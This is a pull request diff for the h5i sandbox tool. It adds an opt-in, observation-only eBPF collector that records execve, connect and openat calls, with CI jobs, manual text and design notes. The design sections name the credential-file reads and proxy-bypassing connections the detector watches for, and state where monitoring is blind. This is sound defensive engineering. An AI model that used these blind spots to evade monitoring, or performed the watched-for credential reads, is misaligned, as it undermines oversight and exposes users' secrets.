### PR TITLE
Runtime detection: a kernel-observed evidence lane (ROADMAP D1–D14)

### DIFF
--- a/.github/workflows/test.yaml
+++ b/.github/workflows/test.yaml
@@ -155,8 +155,11 @@ jobs:
       # The collector's own suite: the wire contract against the C header, the
       # attach table against the probe source, and every signature against a
       # synthetic event stream.
+      # `--features load`: the crate's collector is opt-in like everything else
+      # in this lane, so a bare `-p h5i-bpf` would test the model and skip the
+      # loader — which is the half this job exists for.
       - name: cargo test -p h5i-bpf
-        run: cargo test --locked -p h5i-bpf
+        run: cargo test --locked -p h5i-bpf --features load
 
       # The run seam end to end, on a host with no CAP_BPF: a profile that asked
       # to be watched gets a block with the reason, `require = true` refuses,
@@ -168,7 +171,7 @@ jobs:
       # so the log records *why* it skipped — a suite that silently reports "ok"
       # for a path nobody ran is the thing this whole lane exists to stop.
       - name: live attach (skips without CAP_BPF; prints why)
-        run: cargo test --locked -p h5i-bpf --test live_attach -- --nocapture
+        run: cargo test --locked -p h5i-bpf --features load --test live_attach -- --nocapture
 
   # macOS confines with Seatbelt, not Landlock/seccomp, so the kernel tiers there
   # are a genuinely different code path (crates/h5i-sandbox/src/seatbelt.rs). The

--- a/.github/workflows/test.yaml
+++ b/.github/workflows/test.yaml
@@ -97,6 +97,79 @@ jobs:
           H5I_SKIP_WEB_BUILD: "1"
         run: cargo clippy --locked --workspace --all-targets --no-default-features -- -D warnings
 
+  # The runtime-detection lane (ROADMAP.md D1–D14). Its own job because it needs
+  # a toolchain the other jobs do not — a clang that can target BPF — and
+  # because `bpf` is off by default, so nothing above would notice it rotting.
+  #
+  # What this job can and cannot prove is worth being explicit about, since the
+  # feature is a security one. It proves the probe *compiles* (H5I_BPF_REQUIRE=1
+  # turns a missing clang into a failure rather than a silently detector-less
+  # binary), that the loader compiles against the pinned aya, that the wire
+  # contract between the C and the Rust still agrees, and that the whole run
+  # seam behaves correctly on a host with no CAP_BPF — which is what a GitHub
+  # runner is, and what almost every user's machine is.
+  #
+  # It cannot prove the attach. Loading a program and binding it to a tracepoint
+  # needs CAP_BPF and CAP_PERFMON, which a runner does not grant. That path is
+  # `crates/h5i-bpf/tests/live_attach.rs`, gated on H5I_BPF_LIVE=1, and it skips
+  # loudly rather than passing quietly.
+  bpf:
+    name: runtime detection (eBPF probe + collector)
+    runs-on: ubuntu-latest
+    timeout-minutes: 25
+    env:
+      # Fail the build rather than ship a binary whose detector is permanently
+      # `unavailable`. The same shape as H5I_DRT_REQUIRE in the Lean lane.
+      H5I_BPF_REQUIRE: "1"
+      # This job is about the Rust and the C, not the console bundle.
+      H5I_SKIP_WEB_BUILD: "1"
+    steps:
+      - uses: actions/checkout@v7
+
+      - name: Set Git user for tests
+        run: |
+          git config --global user.name  "github-actions[bot]"
+          git config --global user.email "github-actions[bot]@users.noreply.github.com"
+
+      - uses: dtolnay/rust-toolchain@stable
+        with:
+          components: clippy
+
+      - uses: Swatinem/rust-cache@v2
+        with:
+          key: bpf
+
+      # The runner image ships clang; assert it can actually emit BPF rather
+      # than discovering it three steps later inside a build script. A clang
+      # built without the BPF backend compiles the file and fails at codegen.
+      - name: clang can target BPF
+        run: |
+          clang --version
+          echo 'int probe(void) { return 0; }' > /tmp/probe.c
+          clang -target bpf -O2 -c /tmp/probe.c -o /tmp/probe.o
+          echo "clang can emit BPF"
+
+      - name: cargo clippy (deny warnings)
+        run: cargo clippy --locked --workspace --all-targets --features bpf -- -D warnings
+
+      # The collector's own suite: the wire contract against the C header, the
+      # attach table against the probe source, and every signature against a
+      # synthetic event stream.
+      - name: cargo test -p h5i-bpf
+        run: cargo test --locked -p h5i-bpf
+
+      # The run seam end to end, on a host with no CAP_BPF: a profile that asked
+      # to be watched gets a block with the reason, `require = true` refuses,
+      # and enabling detection moves the pinned policy digest.
+      - name: cargo test --test detect_integration
+        run: cargo test --locked --features bpf --test detect_integration
+
+      # The live attach, which will skip here. Run anyway, and with --nocapture,
+      # so the log records *why* it skipped — a suite that silently reports "ok"
+      # for a path nobody ran is the thing this whole lane exists to stop.
+      - name: live attach (skips without CAP_BPF; prints why)
+        run: cargo test --locked -p h5i-bpf --test live_attach -- --nocapture
+
   # macOS confines with Seatbelt, not Landlock/seccomp, so the kernel tiers there
   # are a genuinely different code path (crates/h5i-sandbox/src/seatbelt.rs). The
   # cross-check job below only proves it *compiles*; this one runs it, which is

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -191,6 +191,12 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d3fb67a6e08acf24fdeccbac2cb6ac4305825bd1f117462e0e6f2f193345ad56"
 
 [[package]]
+name = "assert_matches"
+version = "1.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9b34d609dfbaf33d6889b2b7106d3ca345eacad44200913df5ba02bfd31d2ba9"
+
+[[package]]
 name = "async-channel"
 version = "2.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -295,6 +301,36 @@ dependencies = [
  "tower-layer",
  "tower-service",
  "tracing",
+]
+
+[[package]]
+name = "aya"
+version = "0.14.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "66e644424fada9fff4fdc63848db1732fb69b626e8328202ef55c03df1f4d939"
+dependencies = [
+ "assert_matches",
+ "aya-obj",
+ "bitflags 2.13.1",
+ "hashbrown 0.17.1",
+ "libc",
+ "log",
+ "object",
+ "once_cell",
+ "scopeguard",
+ "thiserror 2.0.18",
+]
+
+[[package]]
+name = "aya-obj"
+version = "0.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8c76b9c75d9cdc155ff8f6a06d61e873f67bf47be8cfa92a3b5aaea43f4b4077"
+dependencies = [
+ "bytes",
+ "log",
+ "object",
+ "thiserror 2.0.18",
 ]
 
 [[package]]
@@ -1870,6 +1906,17 @@ dependencies = [
 ]
 
 [[package]]
+name = "h5i-bpf"
+version = "0.1.0"
+dependencies = [
+ "aya",
+ "h5i-error",
+ "libc",
+ "serde",
+ "serde_json",
+]
+
+[[package]]
 name = "h5i-browser-light"
 version = "0.1.0"
 dependencies = [
@@ -1914,6 +1961,7 @@ dependencies = [
  "fastrand",
  "getrandom 0.3.4",
  "git2",
+ "h5i-bpf",
  "h5i-error",
  "h5i-sandbox",
  "libc",
@@ -3496,6 +3544,18 @@ dependencies = [
  "objc2",
  "objc2-core-foundation",
  "objc2-security",
+]
+
+[[package]]
+name = "object"
+version = "0.39.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2e5a6c098c7a3b6547378093f5cc30bc54fd361ce711e05293a5cc589562739b"
+dependencies = [
+ "crc32fast",
+ "hashbrown 0.17.1",
+ "indexmap",
+ "memchr",
 ]
 
 [[package]]

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -31,6 +31,16 @@ path = "src/main.rs"
 # `--no-default-features` for a build that needs no Node toolchain.
 default = ["web", "share", "runner"]
 web = ["h5i-core/web"]
+# `bpf` adds the runtime-detection collector: an eBPF probe that watches a run
+# from the kernel and files what it saw as its own evidence lane (ROADMAP.md
+# D1–D14). **Off by default**, for two reasons that both have to be true before
+# it earns a place in a default build: it needs `CAP_BPF`, which an ordinary
+# install does not have, and it needs a `clang` that can target BPF at build
+# time. `h5i box detect probe` reports the state of both on any build.
+#
+# The *types* ship either way, through h5i-core, so a receipt written by a
+# `--features bpf` build is readable by one without it.
+bpf = ["h5i-core/bpf"]
 # `runner` adds `h5i runner` — pairing with a second Linux machine and running
 # boxes there over SSH (ROADMAP.md R1–R13). On by default because the worker
 # end of it is this same binary: a runner is an h5i install, so a build that

--- a/MANUAL.md
+++ b/MANUAL.md
@@ -1291,10 +1291,25 @@ Coverage differs by tier, and every receipt says which it got:
 `h5i box detect rules` prints the whole signature catalogue with what each rule
 is for. `h5i box detect show <box>` prints what fired, worst first.
 
-Requirements: Linux 5.8 or newer (`BPF_MAP_TYPE_RINGBUF`), `CAP_BPF` and
-`CAP_PERFMON`, and an h5i built with `--features bpf` by a `clang` that can
-target BPF. No BTF, no `vmlinux.h`, and no kernel headers: the probe reads no
-kernel structure, only syscall tracepoint arguments, which are stable ABI.
+This is opt-in at three separate layers, and all three have to say yes:
+
+| Layer | Switch | Default |
+|---|---|---|
+| build | `cargo install --path . --features bpf` | off — a stock build and the released binaries carry no probe |
+| host | `CAP_BPF` and `CAP_PERFMON` on the h5i binary | not granted |
+| policy | `[profile.X.detect] enabled = true` | false |
+
+`h5i box detect probe` reports all three and prints the command for whichever
+one is missing.
+
+Other requirements: Linux 5.8 or newer (`BPF_MAP_TYPE_RINGBUF`), and a `clang`
+that can target BPF at build time. No BTF, no `vmlinux.h`, and no kernel
+headers: the probe reads no kernel structure, only syscall tracepoint
+arguments, which are stable ABI.
+
+Reading a receipt needs none of it. The evidence types ship in every build, so
+a colleague with a stock h5i can read an export from a machine that had the
+collector.
 
 `wall` is enforced everywhere. **`mem` and `procs` are not enforced at the
 `process` and `supervised` tiers on macOS**: Darwin has no cgroups, does not

--- a/MANUAL.md
+++ b/MANUAL.md
@@ -193,6 +193,24 @@ h5i box log <name>                    # the box's event log
 session spawns is contained by the box rather than by the agent choosing to wrap
 each call.
 
+### h5i box detect
+
+Runtime detection: what an eBPF collector in the kernel saw inside a box.
+Read-only, and available on every build — the verbs are how you find out why
+the collector is *not* working, so gating them behind it would hide the answer
+from the hosts that need it.
+
+```bash
+h5i box detect probe                  # can this machine watch a box, and if not, why
+h5i box detect rules                  # the whole signature catalogue
+h5i box detect rules --filter secret  # one family, or one rule id
+h5i box detect show <name>            # what fired in this box, worst first
+h5i box detect show <name> --min alert
+```
+
+Turn it on per profile with `[profile.<name>.detect] enabled = true`; see
+[Runtime detection](#runtime-detection) for the section and what it costs.
+
 ### Services and ports
 
 ```bash
@@ -228,7 +246,7 @@ Produces:
 | File | What it is |
 |---|---|
 | `patch.diff` | The tree diff against the pinned base, path-validated: no symlink escapes, no nested `.git`, no agent-introduced gitlinks. |
-| `report.md` | What ran, what the browser saw, who was at the controls, and the agent's own proposal. |
+| `report.md` | What ran, what the browser saw, what the kernel saw, who was at the controls, and the agent's own proposal. |
 | `receipt.json` | Every observed execution, with the policy digest that was enforced. |
 | `receipts/<id>.raw` | The full account of each ingress session: who connected, over what path, for how long, how much moved, what was refused. Present when the box was shared. |
 
@@ -241,6 +259,8 @@ Read `report.md` before applying. It surfaces, in this order:
 - **what ran**: every command, its lane, its exit code
 - **what the browser saw**: console errors, uncaught exceptions and failed
   requests, observed by h5i rather than reported by the agent
+- **what the kernel saw**: signatures that fired against the syscalls a box
+  actually made, when runtime detection was on for the run
 - **viewer sessions**: including whether a human took the controls
 - the agent's proposal
 
@@ -1229,6 +1249,53 @@ procs = 256
 wall  = "30m"
 ```
 
+### Runtime detection
+
+Everything above this line is about what a box is *allowed* to do. `[detect]`
+is about what it actually did, reported from a place the box cannot reach: an
+eBPF collector attached to syscall tracepoints for the length of the run.
+
+```toml
+[profile.review.detect]
+enabled   = true      # attach the probe for runs under this profile
+require   = false     # refuse to run when the probe cannot attach
+buffer_kb = 256       # ring buffer size
+rules     = ["*"]     # rule ids, family names, or "*"
+```
+
+It is **observation only**. Nothing in this lane can deny a syscall; denial is
+Landlock, seccomp, the network namespace and the egress proxy, and it stays
+there. What the collector adds is a second opinion on the same run from an
+observer that is neither at the boundary of the box nor inside it: the kernel
+reports `execve`, `connect` and `openat` whether or not anything in the box
+wanted them reported.
+
+`enabled` is `false` by default because the collector needs `CAP_BPF`, which an
+ordinary install does not have. `h5i box detect probe` says whether this
+machine can watch a box and prints the one command that would change that; h5i
+never runs it for you.
+
+`require = true` is the fail-closed switch: if the probe cannot attach, the run
+is refused rather than performed unwatched. That is the setting for "I am
+running somebody else's dependency tree". It is off by default because a
+mandatory detector on a laptop kernel is a tool that does not start.
+
+Coverage differs by tier, and every receipt says which it got:
+
+| Tier | Coverage | Why |
+|---|---|---|
+| `workspace`, `process`, `supervised` | full | the payload is a descendant of h5i, so the kernel-maintained process tree holds it and everything it spawns |
+| `container` | partial | the container runtime double-forks, so the workload leaves h5i's process tree; what stays visible is the runtime's own activity on the host |
+| `microvm` | none | the workload runs against a guest kernel, which a host probe cannot observe at all |
+
+`h5i box detect rules` prints the whole signature catalogue with what each rule
+is for. `h5i box detect show <box>` prints what fired, worst first.
+
+Requirements: Linux 5.8 or newer (`BPF_MAP_TYPE_RINGBUF`), `CAP_BPF` and
+`CAP_PERFMON`, and an h5i built with `--features bpf` by a `clang` that can
+target BPF. No BTF, no `vmlinux.h`, and no kernel headers: the probe reads no
+kernel structure, only syscall tracepoint arguments, which are stable ABI.
+
 `wall` is enforced everywhere. **`mem` and `procs` are not enforced at the
 `process` and `supervised` tiers on macOS**: Darwin has no cgroups, does not
 enforce `RLIMIT_AS` against the mmap'd heap every modern runtime uses, and
@@ -1386,6 +1453,9 @@ never blur:
 | `tee-shim` | The box's shell shim. Box-claimed. |
 | `inbox-capture` | Staged by the box. Box-claimed. |
 
+A record can also carry a `runtime` block, which is a *second observer of the
+same command* rather than a lane of its own — see below.
+
 ### What the browser saw
 
 A run that drove the browser also carries what the page said back: console
@@ -1397,11 +1467,44 @@ A browser command with **no browser to ask** is recorded as `unavailable`, not a
 a clean page. "Nothing was looked at" is a different claim from "nothing was
 wrong", and a reviewer has to be able to tell them apart.
 
+### What the kernel saw
+
+A run under a profile with `[detect] enabled = true` carries a `runtime` block:
+which scope selected the events, how completely it covered the tier, how many
+events were seen and how many were lost, and every signature that fired with a
+few examples of what tripped it.
+
+The block is written **even when the collector could not attach**, carrying the
+reason. That is deliberate and it is the point of the whole lane: a missing
+block and a quiet box would otherwise look identical. Read it this way:
+
+- No `runtime` block at all — the profile did not ask to be watched.
+- A block with `unavailable` — it asked, and the probe could not attach. The
+  reason is in the block; `h5i box detect probe` explains it in full.
+- A block with `coverage: none` or `partial` — some or all of the run happened
+  where this scope cannot reach it, with the reason attached.
+- A block with detections and `events_lost` above zero — the list is a **lower
+  bound**, because events were dropped before anything examined them.
+- A block with no detections, `coverage: full` and `events_lost: 0` — nothing
+  the catalogue models happened. That is not the same as nothing happening:
+  `h5i box detect rules` is a finite list, and behaviour no rule models
+  produces no line.
+
+Every path and command line in the block is a string the box passed to a
+syscall, captured on the way *in*. It is not the kernel's resolution of that
+string, and the probe sees the attempt rather than the outcome — a `connect`
+the network namespace refused looks exactly like one that succeeded.
+
 ### What we do not claim
 
 An agent can stage *extra* records, or stop writing. Both are visible: a gap
 between host-observed exits and box-reported commands is itself a finding. We do
 not claim more than that.
+
+The kernel lane narrows what "stop writing" buys, and does not close it: the
+collector cannot be defeated by a box declining to cooperate, but it only runs
+where the profile asked and the host could attach, and it only reports what a
+signature models.
 
 ---
 
@@ -1585,6 +1688,15 @@ Read these to detect that you are in one; do not set them yourself.
 | `H5I_TEST_CONTAINER` | Opt in to the real-container integration tests (pulls an image, makes a live call). |
 | `H5I_TEST_NET` | Opt in to the supervised egress allowlist end-to-end test (needs outbound network). |
 | `H5I_RUNNER_STATE_DIR` | Where a runner worker keeps box state. For driving a worker against a scratch directory; a real runner uses its default. |
+| `H5I_BPF_LIVE` | Opt in to the live eBPF attach suite. It loads programs into the running kernel, so it needs `CAP_BPF` and does not run by accident; without it the suite skips and prints why. |
+
+### Builds
+
+| Variable | Purpose |
+|---|---|
+| `H5I_BPF_REQUIRE` | Fail the build if the eBPF probe cannot be compiled, instead of shipping a binary whose detector reports `unavailable` forever. Set it in CI and for releases. |
+| `CLANG` | Which `clang` compiles the eBPF probe. Otherwise `clang`, then `clang-20` down to `clang-14`, each tested against the BPF target before it is trusted. |
+| `H5I_SKIP_WEB_BUILD` | Skip the console bundle and leave a stub, for a Rust-only build with no Node on the machine. |
 
 ---
 

--- a/README.md
+++ b/README.md
@@ -47,6 +47,7 @@ h5i gives you:
   - **End-to-end encrypted P2P sharing** when both sides use h5i
   - **Browser-ready demo links** for everyone else, with expiring grants, revocation, and ingress receipts
 - **Reviewable patches and execution logs** showing what changed, what ran, and what was denied
+  - **Kernel-level runtime detection** (opt-in, Linux): an eBPF collector reports what a sandbox's processes actually did, from a place the sandbox cannot reach. Observation only, never enforcement
 
 **Local-first. No hosted sandbox. No SaaS account required.**
 

--- a/ROADMAP.md
+++ b/ROADMAP.md
@@ -4,7 +4,7 @@ Status: in progress, 2026-08-05. Supersedes the "auditable workspaces /
 provenance" positioning for the product surface. Design docs under `roadmap/`
 stay as history for the parts we keep.
 
-This document has four parts:
+This document has five parts:
 
 - **The environment**, sections 1 to 12. Scope, architecture, phases and the
   decisions behind them. Decisions already taken are in section 10; what is
@@ -21,6 +21,10 @@ This document has four parts:
   machine over SSH while the control plane, the repo, and the credentials stay
   local. M17 is its milestone stub; the R sections are the authority on design
   and order.
+- **Runtime detection**, sections D1 to D14. An eBPF collector that watches a
+  run from the kernel, so the receipt carries a lane that is neither at the
+  boundary of the box nor inside it. M18 is its milestone stub; the D sections
+  are the authority on design and order.
 
 **M0 through M5 are built. M6 is mostly built. M7 (the terminal viewer) is
 built but undriven.** What is not done, stated plainly so it is not read as
@@ -3002,6 +3006,23 @@ into the same reviewable patch as today. The design authority is sections R1
 to R13, including the four sub-milestones (R13) and the decision points named
 there. **R13.1 — the crate, the protocol, pairing and probing — is built and
 verified against a real sshd**; R13.2 to R13.4 are not.
+
+### M18. Runtime detection: a kernel-observed lane, 2026-08-19
+
+An eBPF collector that watches a run from the kernel and puts what it saw in
+the run's receipt. Every evidence lane h5i had until now sits either at the
+boundary of the box (h5i as the parent process, the CONNECT proxy) or inside
+it (the tee shim, the browser), so each is defeated by the box declining to
+cooperate or by work happening below the outermost command. This lane is
+neither: the kernel reports `execve`, `connect` and `openat` whether or not
+anything in the box wanted them reported. It is observation only — nothing
+here can deny anything, and denial stays with Landlock, seccomp, the netns
+and the egress proxy — and it is `enabled = false` by default because it
+needs `CAP_BPF`, which an ordinary install does not have. The design
+authority is sections D1 to D14. **All five sub-milestones (D14) are built.**
+What is not demonstrated: the live attach path has been exercised only where
+the capability exists, so on a stock unprivileged install the honest answer
+this ships with is the `unavailable` block naming the missing capability.
 
 ## 9. Limits we state up front
 
@@ -7417,3 +7438,616 @@ Decision points, named not resolved, in the VF.7 discipline:
    work was the quarantine and the scans, `mediated_commit` was left alone,
    and apply landed with the rest. The valve was never pulled because there
    was nothing to valve.
+
+---
+
+# Runtime detection: a kernel-observed lane
+
+Status: designed and built, 2026-08-19. Sections D1 to D14. M18 is its
+milestone stub; these sections are the authority on design and order.
+
+The confinement layer answers "what was the box *allowed* to do". This part
+answers a different question — "what did it actually *do*" — and answers it
+from a place the box cannot reach. Everything here is additive: no policy
+decision changes, no syscall is ever blocked by this code, and a host that
+cannot run it loses nothing it had.
+
+## D1. What is being claimed
+
+The claim is exactly one sentence, and it is deliberately narrow:
+
+> For a run whose receipt carries a `runtime` block with `coverage = "full"`,
+> the listed detections are the ones that fired on events the **kernel**
+> reported for that box's processes, and `events_lost = 0` means no event was
+> dropped between the kernel and the record.
+
+What is **not** claimed:
+
+- Not that the list is complete for the *behaviour*. A signature only fires on
+  what it models. A box that does something nobody wrote a rule for produces a
+  clean detection list and a nonzero event count, and the record says so by
+  carrying both numbers rather than a verdict.
+- Not that it is enforcement. Nothing here can deny anything. Denial is
+  Landlock, seccomp, the netns and the egress proxy, and it stays there (D12).
+- Not that it survives a kernel-level adversary. A box that already has
+  CAP_SYS_ADMIN on the host kernel can unload the programs. h5i's boxes do not
+  have it, and if one did, the eBPF lane is not the thing you lost.
+- Not that absence of the block means the run was clean. Absence means the
+  detector did not run, and the block is written even when it could not
+  attach, carrying the reason.
+
+## D2. The lane problem this fixes
+
+h5i already sorts its evidence into lanes, and the sorting is load-bearing:
+`host-env-run` is what h5i itself observed by being the parent process,
+`tee-shim` is what a shim *inside* the box wrote to a spool, `shell-egress` is
+what the CONNECT proxy refused, `runner-observed` is what a paired machine
+reported over an authenticated channel (R10). The receipt keeps them
+distinguishable forever because they are not equally trustworthy.
+
+Reading down that list, the honest summary of what h5i can see inside a box
+today is:
+
+| lane | who observed it | what it covers | what defeats it |
+|---|---|---|---|
+| `host-env-run` | h5i, as parent | argv, exit code, rusage, wall clock | nothing — but it sees only the *outermost* command |
+| `tee-shim` | a shim in the box | interactive shell commands | `exec` without the shim, a script, any child that does its own work |
+| `shell-egress` | the CONNECT proxy | HTTP(S) the box routed through the proxy | anything that dials a socket directly |
+| `browser` | the browser in the box | console, page errors, failed requests | closing the browser |
+| `runner-observed` | the paired worker | the same as the above, one machine over | the same as the above |
+
+The gap is a single shape repeated four times: **every lane above either sits
+at the boundary of the box or lives inside it.** The boundary lanes see the
+first process and the traffic that chose to go through h5i. The in-box lane
+sees what the box chose to report. Between them sits everything an agent's
+build actually does — the four hundred processes `npm ci` forks, the
+`postinstall` that reads `~/.aws/credentials` because the profile granted the
+directory, the test that dials a hardcoded IP because `net.mode` is `proxy`
+and the proxy only ever sees names.
+
+A kernel-observed lane closes that shape rather than one instance of it. The
+kernel sees every `execve` whether or not a shim wrapped it, every `connect`
+whether or not it spoke HTTP, and every `openat` whether or not the opener
+wanted to be seen. It is the first h5i lane that is neither at the boundary
+nor inside the box, and it is the only one that cannot be defeated by the
+box declining to cooperate.
+
+That is the auditability argument, and it is worth stating what it buys
+concretely, because "more visibility" is not a feature:
+
+1. **Grants that are wider than the behaviour.** `fs_read` on `$HOME` is a
+   grant; `openat("$HOME/.aws/credentials")` is a fact. A profile can now be
+   tightened against what the box *used*, not against what someone guessed.
+2. **The proxy's blind spot.** `net.mode = "proxy"` promises an allowlist; it
+   delivers an allowlist *for clients that use the proxy*. On the workspace
+   tier there is no netns, and a direct `connect(2)` to a literal address goes
+   nowhere near it. That is a limit SECURITY.md states and nothing observed.
+   Now something does.
+3. **The shim's blind spot.** `tee-shim` is box-claimed by construction and
+   the roadmap has always said so. Now there is a second opinion on the same
+   run from a lane that is not.
+
+## D3. Related work: Tracee and Tetragon, and what not to take
+
+Both references solve this problem at a scale h5i does not have, and both
+carry design decisions that are right for a cluster agent and wrong here.
+
+**Tracee** (`../../Ref/tracee`) is the closer relative: a syscall-centric
+collector with a signature engine on top, and its events-plus-signatures
+split is exactly the shape adopted here (D7, D9). What is taken:
+
+- The split between a **collector** that knows only about events and a
+  **signature layer** that knows only about semantics. Rules never touch a
+  ring buffer; the collector never knows what a credential file is.
+- The insistence that a dropped event is reported, not smoothed over. Tracee
+  counts losses per buffer and surfaces them; the receipt here carries
+  `events_lost` next to `events_seen` for the same reason a truncated raw
+  payload is marked truncated.
+- Argument capture at `sys_enter` with an explicit, bounded string budget,
+  rather than chasing pointers into user memory without a cap.
+
+What is refused:
+
+- **The event catalogue.** Tracee instruments hundreds of events, has a
+  policy language to select among them, and needs CO-RE plus a full BTF
+  toolchain to do it. h5i instruments twelve tracepoints and no more (D5, D7).
+  A detector that costs a second toolchain is a detector nobody builds.
+- **The daemon.** Tracee runs as a service and streams. h5i has no daemon by
+  design (R11 argued the same thing for the runner), and the unit of
+  observation here is a run, not a host.
+
+**Tetragon** (`../../Ref/tetragon`) contributes one idea and one warning. The
+idea is **process-lineage-as-first-class**: an event is not interesting on its
+own, it is interesting because of the process tree it sits in, so the tree is
+maintained in the kernel rather than reconstructed by racing `/proc` in
+userspace. That is exactly the scope mechanism in D6, and the reason it is a
+kernel-side map instead of a userspace `procfs` walk: by the time userspace
+reads `/proc/<pid>`, a short-lived `postinstall` script is already gone.
+
+The warning is enforcement. Tetragon can kill a process from a hook, and its
+documentation is careful about the race between observing and acting. h5i does
+not take that: enforcement stays in the mechanisms that fail closed by
+construction, and this lane is observation only (D12). A detector that
+sometimes blocks is a policy layer with unclear semantics, and h5i already has
+a policy layer with clear ones.
+
+## D4. Why aya, and why the probe is C
+
+**The loader is `aya`** (`../../Ref/aya`). It is pure Rust: no `libbpf`, no
+`libelf`, no `bindgen`, no C toolchain at *link* time, and no new
+cross-compilation story for the musl and Darwin targets the release matrix
+already builds. The alternatives were `libbpf-rs` (drags in libbpf, libelf and
+zlib as native link-time dependencies, which the aarch64-musl `cross` target
+would have to grow) and hand-rolling `bpf(2)` (about two thousand lines of
+ELF parsing and map plumbing that aya has already had reviewed).
+
+**The probe itself is C**, compiled by `clang -target bpf` in the crate's
+build script, and this is the decision most likely to be questioned, because
+aya has a perfectly good Rust eBPF frontend. It is C for three reasons:
+
+1. `aya-ebpf` requires a **nightly** toolchain and the `bpf-linker` binary.
+   h5i builds on stable, and `dtolnay/rust-toolchain@stable` is in every CI
+   job. Adding a nightly toolchain plus a cargo-installed linker to the build
+   of an *optional* observability feature is a poor trade.
+2. The probe is ~350 lines of straight-line code with no allocation, no
+   generics and no error handling — the part of the system where C's
+   disadvantages are smallest and its toolchain's ubiquity is largest.
+3. Every reference implementation writes its probes in C, so the code is
+   reviewable against them line for line.
+
+The build script is honest about the toolchain rather than demanding it. No
+`clang` that can target BPF means the object is not built, the crate still
+compiles, and the loader reports `unavailable` with the reason "built without
+the eBPF object". `H5I_BPF_REQUIRE=1` turns that into a build failure, which is
+what this lane's CI job sets, in the shape `H5I_DRT_REQUIRE` already
+established for the Lean lane.
+
+The released binaries do **not** carry the probe, and that is stated rather
+than left to be discovered. The release matrix cross-builds musl targets inside
+containers with no LLVM, and putting a BPF-capable clang into four images — to
+ship a feature that *also* needs `CAP_BPF` on the user's machine — is work that
+should follow somebody wanting it rather than precede them. `h5i box detect
+probe` reports the consequence in one line and prints the
+`cargo install --path . --features bpf` that fixes it.
+
+## D5. No CO-RE: the stable-ABI cut
+
+CO-RE (Compile Once, Run Everywhere) exists because reading kernel structures
+from a probe is not portable: `task_struct` changes shape between kernels, so
+libbpf rewrites field offsets at load time using the running kernel's BTF.
+Every reference implementation depends on it, and it costs a `vmlinux.h`
+generated by `bpftool` at build time (three megabytes of generated header),
+BTF at runtime, and a relocating loader.
+
+h5i does not pay any of that, because of a deliberate cut:
+
+> **The probe reads no kernel structure.** It reads only syscall tracepoint
+> arguments, which are a stable kernel ABI, and calls only helpers whose
+> signatures are stable.
+
+Concretely, everything the probe touches is on this list and nothing else:
+
+- The `syscalls/sys_enter_*` tracepoint context, whose layout is fixed
+  (`u64 pad; long id; unsigned long args[6];`) and is the documented,
+  ABI-stable format for every syscall entry tracepoint.
+- The `sched/sched_process_fork` and `sched/sched_process_exit` contexts,
+  read through their published field offsets, which the loader **verifies at
+  attach time** by parsing `/sys/kernel/tracing/events/.../format` rather
+  than assuming. A kernel that moved a field is refused, not misread.
+- `bpf_get_current_pid_tgid`, `bpf_get_current_uid_gid`,
+  `bpf_get_current_comm`, `bpf_ktime_get_ns`, `bpf_get_current_cgroup_id`,
+  `bpf_get_ns_current_pid_tgid`, `bpf_probe_read_user`,
+  `bpf_probe_read_user_str`, `bpf_ringbuf_reserve/submit/discard`,
+  and the map accessors. All stable since 5.8 at the latest, which is the
+  floor the loader checks for (ring buffer support) and the floor stated in
+  the limits.
+
+What the cut costs, stated up front: no `task_struct` walking, so no parent
+`comm` without keeping it ourselves, no cgroup *path* (only the id), no
+mount-namespace inode, no file inode on `openat` (only the path string the
+caller passed, which is a caller-controlled string and is labelled as such in
+the record). Those are real losses. They buy a probe that loads on any kernel
+from 5.8 to whatever ships next, with no build-time kernel headers and no
+runtime BTF, which is the difference between a feature that works on a user's
+WSL2 kernel and one that works on the maintainer's laptop.
+
+## D6. Scope: which events belong to which box
+
+The hard problem in a per-run detector is not collecting events; it is knowing
+which of the host's events are the box's. Getting this wrong in the permissive
+direction reports the user's own editor as box activity, and getting it wrong
+in the restrictive direction misses the interesting child.
+
+Three mechanisms were considered. **One is implemented**, and the reason the
+other two are not is a single constraint that is worth stating plainly, because
+it is not obvious until you try:
+
+> The scope has to be decided **before the payload exists**. A scope programmed
+> after the child is spawned has already missed the `execve` that named it,
+> which is the most valuable single event of the run.
+
+- **cgroup id** (`bpf_get_current_cgroup_id`) is exact, cheap and immune to pid
+  reuse, and it is unusable here: the run's cgroup is created *inside* the
+  spawn path (`sandbox::make_run_cgroup`), so it does not exist when the scope
+  must be programmed. On most hosts it does not exist at all — cgroup
+  delegation is unavailable without a systemd user manager that grants it, and
+  `cgroup.rs` says so at length.
+- **pid namespace** (`bpf_get_ns_current_pid_tgid`) has the same defect for the
+  same reason, one level up: the inode comes from `/proc/<pid>/ns/pid` of a
+  process that has not been forked yet.
+- **The process tree** is the one thing that *is* knowable in advance, because
+  h5i is already running. This is the Tetragon idea (D3): lineage maintained in
+  the kernel rather than reconstructed by racing `/proc`, because by the time
+  userspace reads `/proc/<pid>` the forty-millisecond `postinstall` is gone.
+
+So the scope is `pidtree`, seeded with **every task of the h5i process** (all of
+them, not just the main thread: `Command::spawn` can be called from any thread,
+and a tree seeded with one would miss a payload spawned from a worker). The
+kernel grows the set on `sched_process_fork` and prunes it on
+`sched_process_exit`.
+
+Seeding from h5i's own tree leaves two holes, and the probe's state machine
+closes both. They are worth describing because each was a wrong answer first:
+
+1. **h5i's own threads are not the box.** A new task forked from something in
+   the set is `PENDING` until its first event, and that event settles it: a
+   task whose tid equals its tgid leads its own thread group and is therefore a
+   *process* — the payload, or something the payload spawned — while anything
+   else is one of h5i's threads and is marked `SELF` and never reported again.
+   That test is exact, costs one comparison, and needs no kernel structure.
+2. **h5i's own bootstrap is not the box either.** Between the fork and the
+   exec, the child is still running h5i's `pre_exec` code: applying Landlock,
+   opening the ruleset paths, setting rlimits. Attributing those `openat`s to
+   the box would report h5i's confinement machinery as the box's behaviour. So
+   a task in the tree is `PRE` until its `execve`, and in that state only the
+   exec itself (and the tree bookkeeping) is emitted. A child *inherits* its
+   parent's post-exec state, so a fork-only worker — Python multiprocessing, a
+   shell subshell — is not silently muted for never having execed.
+
